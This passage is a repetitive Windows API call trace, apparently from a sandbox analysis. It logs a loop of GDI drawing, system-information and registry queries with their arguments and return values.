hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.737] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.737] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff04027d [0017.737] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9040713 [0017.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd3 [0017.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd4 [0017.737] CombineRgn (hrgnDst=0x1040cd3, hrgnSrc1=0xff04027d, hrgnSrc2=0x9040713, iMode=1) returned 1 [0017.737] CombineRgn (hrgnDst=0x1040cd4, hrgnSrc1=0xff04027d, hrgnSrc2=0x9040713, iMode=4) returned 2 [0017.737] CreateSolidBrush (color=0xff) returned 0x2100cd2 [0017.737] CreateSolidBrush (color=0xff0000) returned 0x1100cd5 [0017.737] DeleteObject (ho=0x1100cd5) returned 1 [0017.737] DeleteObject (ho=0x9040713) returned 1 [0017.737] DeleteObject (ho=0xff04027d) returned 1 [0017.738] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.738] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.738] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.738] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.738] BeginPath (hdc=0x0) returned 0 [0017.738] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.738] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.738] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.738] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.738] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa040713 [0017.738] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4027d [0017.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd6 [0017.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd7 [0017.738] CombineRgn (hrgnDst=0x1040cd6, hrgnSrc1=0xa040713, hrgnSrc2=0x4027d, iMode=1) returned 1 [0017.738] CombineRgn (hrgnDst=0x1040cd7, hrgnSrc1=0xa040713, hrgnSrc2=0x4027d, iMode=4) returned 2 [0017.738] CreateSolidBrush (color=0xff) returned 0x2100cd5 [0017.738] CreateSolidBrush (color=0xff0000) returned 0x1100cd8 [0017.738] DeleteObject (ho=0x1100cd8) returned 1 [0017.738] DeleteObject (ho=0x4027d) returned 1 [0017.738] DeleteObject (ho=0xa040713) returned 1 [0017.738] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.738] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.739] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.739] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.739] BeginPath (hdc=0x0) returned 0 [0017.739] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.739] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.739] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.739] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.739] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x104027d [0017.739] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb040713 [0017.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cd9 [0017.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cda [0017.739] CombineRgn (hrgnDst=0x1040cd9, hrgnSrc1=0x104027d, hrgnSrc2=0xb040713, iMode=1) returned 1 [0017.739] CombineRgn (hrgnDst=0x1040cda, hrgnSrc1=0x104027d, hrgnSrc2=0xb040713, iMode=4) returned 2 [0017.739] CreateSolidBrush (color=0xff) returned 0x2100cd8 [0017.739] CreateSolidBrush (color=0xff0000) returned 0x1100cdb [0017.739] DeleteObject (ho=0x1100cdb) returned 1 [0017.739] DeleteObject (ho=0xb040713) returned 1 [0017.739] DeleteObject (ho=0x104027d) returned 1 [0017.739] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.739] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.739] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.739] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.740] BeginPath (hdc=0x0) returned 0 [0017.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.740] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.740] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.740] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc040713 [0017.740] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x204027d [0017.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdc [0017.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdd [0017.740] CombineRgn (hrgnDst=0x1040cdc, hrgnSrc1=0xc040713, hrgnSrc2=0x204027d, iMode=1) returned 1 [0017.740] CombineRgn (hrgnDst=0x1040cdd, hrgnSrc1=0xc040713, hrgnSrc2=0x204027d, iMode=4) returned 2 [0017.740] CreateSolidBrush (color=0xff) returned 0x2100cdb [0017.740] CreateSolidBrush (color=0xff0000) returned 0x1100cde [0017.740] DeleteObject (ho=0x1100cde) returned 1 [0017.740] DeleteObject (ho=0x204027d) returned 1 [0017.740] DeleteObject (ho=0xc040713) returned 1 [0017.740] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.740] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.740] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.740] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.740] BeginPath (hdc=0x0) returned 0 [0017.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.740] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.741] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.741] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.741] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x304027d [0017.741] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd040713 [0017.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cdf [0017.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce0 [0017.741] CombineRgn (hrgnDst=0x1040cdf, hrgnSrc1=0x304027d, hrgnSrc2=0xd040713, iMode=1) returned 1 [0017.741] CombineRgn (hrgnDst=0x1040ce0, hrgnSrc1=0x304027d, hrgnSrc2=0xd040713, iMode=4) returned 2 [0017.741] CreateSolidBrush (color=0xff) returned 0x2100cde [0017.741] CreateSolidBrush (color=0xff0000) returned 0x1100ce1 [0017.741] DeleteObject (ho=0x1100ce1) returned 1 [0017.741] DeleteObject (ho=0xd040713) returned 1 [0017.741] DeleteObject (ho=0x304027d) returned 1 [0017.741] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.741] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.741] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.741] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.741] BeginPath (hdc=0x0) returned 0 [0017.741] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.741] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.741] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.742] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.742] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe040713 [0017.742] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x404027d [0017.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce2 [0017.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce3 [0017.742] CombineRgn (hrgnDst=0x1040ce2, hrgnSrc1=0xe040713, hrgnSrc2=0x404027d, iMode=1) returned 1 [0017.742] CombineRgn (hrgnDst=0x1040ce3, hrgnSrc1=0xe040713, hrgnSrc2=0x404027d, iMode=4) returned 2 [0017.742] CreateSolidBrush (color=0xff) returned 0x2100ce1 [0017.742] CreateSolidBrush (color=0xff0000) returned 0x1100ce4 [0017.742] DeleteObject (ho=0x1100ce4) returned 1 [0017.742] DeleteObject (ho=0x404027d) returned 1 [0017.742] DeleteObject (ho=0xe040713) returned 1 [0017.742] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.742] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.742] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.742] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.742] BeginPath (hdc=0x0) returned 0 [0017.742] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.742] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.742] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.742] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.743] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x504027d [0017.743] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf040713 [0017.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce5 [0017.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce6 [0017.743] CombineRgn (hrgnDst=0x1040ce5, hrgnSrc1=0x504027d, hrgnSrc2=0xf040713, iMode=1) returned 1 [0017.743] CombineRgn (hrgnDst=0x1040ce6, hrgnSrc1=0x504027d, hrgnSrc2=0xf040713, iMode=4) returned 2 [0017.743] CreateSolidBrush (color=0xff) returned 0x2100ce4 [0017.743] CreateSolidBrush (color=0xff0000) returned 0x1100ce7 [0017.743] DeleteObject (ho=0x1100ce7) returned 1 [0017.743] DeleteObject (ho=0xf040713) returned 1 [0017.743] DeleteObject (ho=0x504027d) returned 1 [0017.743] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.743] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.743] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.743] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.743] BeginPath (hdc=0x0) returned 0 [0017.743] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.743] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.743] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.743] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.743] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.743] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.744] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10040713 [0017.744] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x604027d [0017.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce8 [0017.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce9 [0017.744] CombineRgn (hrgnDst=0x1040ce8, hrgnSrc1=0x10040713, hrgnSrc2=0x604027d, iMode=1) returned 1 [0017.744] CombineRgn (hrgnDst=0x1040ce9, hrgnSrc1=0x10040713, hrgnSrc2=0x604027d, iMode=4) returned 2 [0017.744] CreateSolidBrush (color=0xff) returned 0x2100ce7 [0017.744] CreateSolidBrush (color=0xff0000) returned 0x1100cea [0017.744] DeleteObject (ho=0x1100cea) returned 1 [0017.744] DeleteObject (ho=0x604027d) returned 1 [0017.744] DeleteObject (ho=0x10040713) returned 1 [0017.744] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.744] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.744] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.744] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.744] BeginPath (hdc=0x0) returned 0 [0017.744] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.744] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.744] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.744] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.744] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.744] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x704027d [0017.744] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x11040713 [0017.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ceb [0017.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cec [0017.745] CombineRgn (hrgnDst=0x1040ceb, hrgnSrc1=0x704027d, hrgnSrc2=0x11040713, iMode=1) returned 1 [0017.745] CombineRgn (hrgnDst=0x1040cec, hrgnSrc1=0x704027d, hrgnSrc2=0x11040713, iMode=4) returned 2 [0017.745] CreateSolidBrush (color=0xff) returned 0x2100cea [0017.745] CreateSolidBrush (color=0xff0000) returned 0x1100ced [0017.745] DeleteObject (ho=0x1100ced) returned 1 [0017.745] DeleteObject (ho=0x11040713) returned 1 [0017.745] DeleteObject (ho=0x704027d) returned 1 [0017.745] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.745] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.745] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.745] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.745] BeginPath (hdc=0x0) returned 0 [0017.745] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.745] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.745] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.745] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.745] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.745] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x12040713 [0017.745] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x804027d [0017.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cee [0017.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cef [0017.745] CombineRgn (hrgnDst=0x1040cee, hrgnSrc1=0x12040713, hrgnSrc2=0x804027d, iMode=1) returned 1 [0017.746] CombineRgn (hrgnDst=0x1040cef, hrgnSrc1=0x12040713, hrgnSrc2=0x804027d, iMode=4) returned 2 [0017.746] CreateSolidBrush (color=0xff) returned 0x2100ced [0017.746] CreateSolidBrush (color=0xff0000) returned 0x1100cf0 [0017.746] DeleteObject (ho=0x1100cf0) returned 1 [0017.746] DeleteObject (ho=0x804027d) returned 1 [0017.746] 